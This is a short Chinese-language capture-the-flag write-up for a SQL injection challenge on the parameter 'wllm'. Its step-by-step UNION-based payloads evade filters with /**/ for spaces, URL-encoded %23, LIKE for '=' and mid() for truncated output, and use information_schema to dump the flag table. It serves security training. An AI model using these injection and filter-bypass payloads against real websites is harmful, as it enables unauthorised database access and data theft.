题目:
提示参数是wllm。
先尝试有无注入漏洞:
?wllm='
有,开始注入。
一、爆库
查列数
?wllm='union select 1,2#
轮流尝试关键字,发现其过滤了空格。我们可以使用 /**/ 代替空格。
同时我们还要将 # 符进行url编码,即 %23。
?wllm='union/**/select/**/1,2%23
?wllm='union/**/select/**/1,2,3%23
得知有三列,开始爆数据库。
?wllm='union/**/select/**/1,2,database()%23
数据库为:test_db。
二、爆表
等号 = 被过滤了,用 like 代替。
?wllm='union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()%23爆库多此一举
表有:LTLT_flag,users
显然flag在LTLT_flag中。
三、爆列
?wllm='union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'LTLT_flag'%23
列有:id,flag。
四、爆数据
?wllm='union/**/select/**/1,flag,3/**/from/**/LTLT_flag%23
字段的输出长度被限制,要截取字符串。
而left,right,substr,reverse关键字被过滤,可用mid。
?wllm='union/**/select/**/1,mid(flag,20,20),3/**/from/**/LTLT_flag%23
?wllm='union/**/select/**/1,mid(flag,40,20),3/**/from/**/LTLT_flag%23
拼接即可。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
